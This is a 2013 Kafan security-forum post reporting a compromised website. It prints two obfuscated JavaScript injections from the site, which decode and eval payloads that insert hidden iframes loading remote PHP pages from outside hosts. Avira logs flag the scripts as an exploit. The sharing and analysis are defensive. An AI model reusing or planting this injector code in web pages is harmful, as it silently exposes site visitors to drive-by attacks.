查看: 1229|回复: 0
收起左侧

[已鉴定] http://asldrainservices.rtrk.co.uk/

[复制链接]
fireold
发表于 2013-9-18 19:48:24 | 显示全部楼层 |阅读模式
  1. /*74ed9f*/
  2. eqbie = "y";
  3. yrbx = "d" + "o" + "c" + "u" + "ment";
  4. try {
  5.     +
  6.     function() {
  7.         if (document.querySelector)++(window[yrbx].getElementById("asd")) == null
  8.     }()
  9. } catch (mbdru) {
  10.     yoncv = function(atzy) {
  11.         atzy = "fr" + "omCh" + atzy;
  12.         for (radydp = 0; radydp < eqbie.length; radydp++) {
  13.             hlc += String[atzy](jho(dvxc + (eqbie[radydp])) - (100));
  14.         }
  15.     };
  16. };
  17. jho = (window.eval);
  18. dvxc = "0x";
  19. mrkbmo = 0;
  20. try {;
  21. } catch (uwgbuq) {
  22.     mrkbmo = 1
  23. }
  24. if (!mrkbmo) {
  25.     try {
  26.         ++jho(yrbx)["\x62o" + "d" + eqbie]
  27.     } catch (mbdru) {
  28.         ffbw = "^";
  29.     }
  30.     eqbie = "84^ca^d9^d2^c7^d8^cd^d3^d2^84^d0^c5^d5^d7^d5^94^9d^8c^8d^84^df^71^6e^84^da^c5^d6^84^d7^d8^c5^d8^cd^c7^a1^8b^c5^ce^c5^dc^8b^9f^71^6e^84^da^c5^d6^84^c7^d3^d2^d8^d6^d3^d0^d0^c9^d6^a1^8b^cd^d2^c8^c9^dc^92^d4^cc^d4^8b^9f^71^6e^84^da^c5^d6^84^d0^c5^d5^d7^d5^84^a1^84^c8^d3^c7^d9^d1^c9^d2^d8^92^c7^d6^c9^c5^d8^c9^a9^d0^c9^d1^c9^d2^d8^8c^8b^cd^ca^d6^c5^d1^c9^8b^8d^9f^71^6e^71^6e^84^d0^c5^d5^d7^d5^92^d7^d6^c7^84^a1^84^8b^cc^d8^d8^d4^9e^93^93^9a^96^92^95^96^9d^92^96^96^9a^92^9a^99^93^d4^d6^c9^d7^d7^d4^cc^d3^d8^d3^c7^c9^d2^d8^c9^d6^93^c8^af^b8^96^d5^dc^9a^ae^92^d4^cc^d4^8b^9f^71^6e^84^d0^c5^d5^d7^d5^92^d7^d8^dd^d0^c9^92^d4^d3^d7^cd^d8^cd^d3^d2^84^a1^84^8b^c5^c6^d7^d3^d0^d9^d8^c9^8b^9f^71^6e^84^d0^c5^d5^d7^d5^92^d7^d8^dd^d0^c9^92^c7^d3^d0^d3^d6^84^a1^84^8b^9a^99^8b^9f^71^6e^84^d0^c5^d5^d7^d5^92^d7^d8^dd^d0^c9^92^cc^c9^cd^cb^cc^d8^84^a1^84^8b^9a^99^d4^dc^8b^9f^71^6e^84^d0^c5^d5^d7^d5^92^d7^d8^dd^d0^c9^92^db^cd^c8^d8^cc^84^a1^84^8b^9a^99^d4^dc^8b^9f^71^6e^84^d0^c5^d5^d7^d5^92^d7^d8^dd^d0^c9^92^d0^c9^ca^d8^84^a1^84^8b^95^94^94^94^9a^99^8b^9f^71^6e^84^d0^c5^d5^d7^d5^92^d7^d8^dd^d0^c9^92^d8^d3^d4^84^a1^84^8b^95^94^94^94^9a^99^8b^9f^71^6e^71^6e^84^cd^ca^84^8c^85^c8^d3^c7^d9^d1^c9^d2^d8^92^cb^c9^d8^a9^d0^c9^d1^c9^d2^d8^a6^dd^ad^c8^8c^8b^d0^c5^d5^d7^d5^8b^8d^8d^84^df^71^6e^84^c8^d3^c7^d9^d1^c9^d2^d8^92^db^d6^cd^d8^c9^8c^8b^a0^d4^84^cd^c8^a1^c0^8b^d0^c5^d5^d7^d5^c0^8b^84^c7^d0^c5^d7^d7^a1^c0^8b^d0^c5^d5^d7^d5^94^9d^c0^8b^84^a2^a0^93^d4^a2^8b^8d^9f^71^6e^84^c8^d3^c7^d9^d1^c9^d2^d8^92^cb^c9^d8^a9^d0^c9^d1^c9^d2^d8^a6^dd^ad^c8^8c^8b^d0^c5^d5^d7^d5^8b^8d^92^c5^d4^d4^c9^d2^c8^a7^cc^cd^d0^c8^8c^d0^c5^d5^d7^d5^8d^9f^71^6e^84^e1^71^6e^e1^71^6e^ca^d9^d2^c7^d8^cd^d3^d2^84^b7^c9^d8^a7^d3^d3^cf^cd^c9^8c^c7^d3^d3^cf^cd^c9^b2^c5^d1^c9^90^c7^d3^d3^cf^cd^c9^ba^c5^d0^d9^c9^90^d2^a8^c5^dd^d7^90^d4^c5^d8^cc^8d^84^df^71^6e^84^da^c5^d6^84^d8^d3^c8^c5^dd^84^a1^84^d2^c9^db^84^a8^c5^d8^c9^8c^8d^9f^71^6e^84^da^c5^d6^84^c9^dc^d4^cd^d6^c9^84^a1^84^d2^c9^db^84^a8^c5^d8^c9^8c^8d^9f^71^6e^84^cd^ca^84^8c^d2^a8^c5^dd^d7^a1^a1^d2^d9^d0^d0^84^e0^e0^84^d2^a8^c5^dd^d7^a1^a1^94^8d^84^d2^a8^c5^dd^d7^a1^95^9f^71^6e^84^c9^dc^d4^cd^d6^c9^92^d7^c9^d8^b8^cd^d1^c9^8c^d8^d3^c8^c5^dd^92^cb^c9^d8^b8^cd^d1^c9^8c^8d^84^8f^84^97^9a^94^94^94^94^94^8e^96^98^8e^d2^a8^c5^dd^d7^8d^9f^71^6e^84^c8^d3^c7^d9^d1^c9^d2^d8^92^c7^d3^d3^cf^cd^c9^84^a1^84^c7^d3^d3^cf^cd^c9^b2^c5^d1^c9^8f^86^a1^86^8f^c9^d7^c7^c5^d4^c9^8c^c7^d3^d3^cf^cd^c9^ba^c5^d0^d9^c9^8d^71^6e^84^8f^84^86^9f^c9^dc^d4^cd^d6^c9^d7^a1^86^84^8f^84^c9^dc^d4^cd^d6^c9^92^d8^d3^ab^b1^b8^b7^d8^d6^cd^d2^cb^8c^8d^84^8f^84^8c^8c^d4^c5^d8^cc^8d^84^a3^84^86^9f^84^d4^c5^d8^cc^a1^86^84^8f^84^d4^c5^d8^cc^84^9e^84^86^86^8d^9f^71^6e^e1^71^6e^ca^d9^d2^c7^d8^cd^d3^d2^84^ab^c9^d8^a7^d3^d3^cf^cd^c9^8c^84^d2^c5^d1^c9^84^8d^84^df^71^6e^84^da^c5^d6^84^d7^d8^c5^d6^d8^84^a1^84^c8^d3^c7^d9^d1^c9^d2^d8^92^c7^d3^d3^cf^cd^c9^92^cd^d2^c8^c9^dc^b3^ca^8c^84^d2^c5^d1^c9^84^8f^84^86^a1^86^84^8d^9f^71^6e^84^da^c5^d6^84^d0^c9^d2^84^a1^84^d7^d8^c5^d6^d8^84^8f^84^d2^c5^d1^c9^92^d0^c9^d2^cb^d8^cc^84^8f^84^95^9f^71^6e^84^cd^ca^84^8c^84^8c^84^85^d7^d8^c5^d6^d8^84^8d^84^8a^8a^71^6e^84^8c^84^d2^c5^d1^c9^84^85^a1^84^c8^d3^c7^d9^d1^c9^d2^d8^92^c7^d3^d3^cf^cd^c9^92^d7^d9^c6^d7^d8^d6^cd^d2^cb^8c^84^94^90^84^d2^c5^d1^c9^92^d0^c9^d2^cb^d8^cc^84^8d^84^8d^84^8d^71^6e^84^df^71^6e^84^d6^c9^d8^d9^d6^d2^84^d2^d9^d0^d0^9f^71^6e^84^e1^71^6e^84^cd^ca^84^8c^84^d7^d8^c5^d6^d8^84^a1^a1^84^91^95^84^8d^84^d6^c9^d8^d9^d6^d2^84^d2^d9^d0^d0^9f^71^6e^84^da^c5^d6^84^c9^d2^c8^84^a1^84^c8^d3^c7^d9^d1^c9^d2^d8^92^c7^d3^d3^cf^cd^c9^92^cd^d2^c8^c9^dc^b3^ca^8c^84^86^9f^86^90^84^d0^c9^d2^84^8d^9f^71^6e^84^cd^ca^84^8c^84^c9^d2^c8^84^a1^a1^84^91^95^84^8d^84^c9^d2^c8^84^a1^84^c8^d3^c7^d9^d1^c9^d2^d8^92^c7^d3^d3^cf^cd^c9^92^d0^c9^d2^cb^d8^cc^9f^71^6e^84^d6^c9^d8^d9^d6^d2^84^d9^d2^c9^d7^c7^c5^d4^c9^8c^84^c8^d3^c7^d9^d1^c9^d2^d8^92^c7^d3^d3^cf^cd^c9^92^d7^d9^c6^d7^d8^d6^cd^d2^cb^8c^84^d0^c9^d2^90^84^c9^d2^c8^84^8d^84^8d^9f^71^6e^e1^71^6e^cd^ca^84^8c^d2^c5^da^cd^cb^c5^d8^d3^d6^92^c7^d3^d3^cf^cd^c9^a9^d2^c5^c6^d0^c9^c8^8d^71^6e^df^71^6e^cd^ca^8c^ab^c9^d8^a7^d3^d3^cf^cd^c9^8c^8b^da^cd^d7^cd^d8^c9^c8^c3^d9^d5^8b^8d^a1^a1^99^99^8d^df^e1^c9^d0^d7^c9^df^b7^c9^d8^a7^d3^d3^cf^cd^c9^8c^8b^da^cd^d7^cd^d8^c9^c8^c3^d9^d5^8b^90^84^8b^99^99^8b^90^84^8b^95^8b^90^84^8b^93^8b^8d^9f^71^6e^71^6e^d0^c5^d5^d7^d5^94^9d^8c^8d^9f^71^6e^e1^71^6e^e1".split(ffbw);
  31.     hlc = "";
  32.     yoncv("arCode");
  33.     jho("" + hlc);
  34. } /*/74ed9f*/


  35. /*a9a007*/
  36. rozer = document;
  37. ruyohk = "spl" + "i" + "t";
  38. eirira = window;
  39. kdpd = "0" + "x";
  40. bhxr = (5 - 3 - 1);
  41. try {
  42.     --(rozer["body"])
  43. } catch (yueqo) {
  44.     wfgicr = false;
  45.     try {} catch (eoi) {
  46.         wfgicr = 21;
  47.     }
  48.     if (1) {
  49.         hsjett = "17:5d:6c:65:5a:6b:60:66:65:17:64:5b:5e:63:61:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:64:5b:5e:63:61:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:64:5b:5e:63:61:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:59:5c:64:5f:66:6a:6b:60:65:5e:25:65:5c:6b:26:6b:5c:64:67:63:58:6b:5c:6a:26:69:5c:63:25:67:5f:67:1e:32:4:1:17:64:5b:5e:63:61:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:64:5b:5e:63:61:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:28:2d:2c:28:1e:32:4:1:17:64:5b:5e:63:61:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:28:2d:2c:28:67:6f:1e:32:4:1:17:64:5b:5e:63:61:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:28:2d:2c:28:67:6f:1e:32:4:1:17:64:5b:5e:63:61:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:28:2d:2c:28:1e:32:4:1:17:64:5b:5e:63:61:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:28:2d:2c:28:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:64:5b:5e:63:61:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:64:5b:5e:63:61:53:1e:17:5a:63:58:6a:6a:34:53:1e:64:5b:5e:63:61:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:64:5b:5e:63:61:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:64:5b:5e:63:61:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:64:5b:5e:63:61:27:30:1f:20:32:4:1:74:4:1:74" [ruyohk](":");
  50.     }
  51.     eirira = hsjett;
  52.     kbsux = [];
  53.     for (ewcy = 22 - 20 - 2; - ewcy + 1433 != 0; ewcy += 1) {
  54.         ugrzea = ewcy;
  55.         if ((0x19 == 031)) kbsux += String.fromCharCode(eval(kdpd + eirira[1 * ugrzea]) + 0xa - bhxr);
  56.     }
  57.     oazl = eval;
  58.     oazl(kbsux)
  59. } /*/a9a007*/
复制代码


Avira
2013/9/18 下午 07:44 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jscookmenu[1].js'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '50f93f7e.qua' 名稱底下的隔離區目錄。.

2013/9/18 下午 07:44 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        764
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/9/18 下午 07:43 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\asldrainservices-px_rtrk_co_uk[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '55053cff.qua' 名稱底下的隔離區目錄。.

2013/9/18 下午 07:43 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        762
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/9/18 下午 07:43 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jscookmenu[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/9/18 下午 07:43 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jscookmenu[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2013/9/18 下午 07:43 [Web Protection] 發現惡意程式碼
      從 URL "http://asldrainservices-px.rtrk.co.uk/jscookmenu.js" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過

2013/9/18 下午 07:43 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\asldrainservices-px_rtrk_co_uk[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/9/18 下午 07:43 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\asldrainservices-px_rtrk_co_uk[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2013/9/18 下午 07:43 [Web Protection] 發現惡意程式碼
      從 URL "http://asldrainservices-px.rtrk.co.uk/" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過


av.jpg




fs.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 08:48 , Processed in 0.133576 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表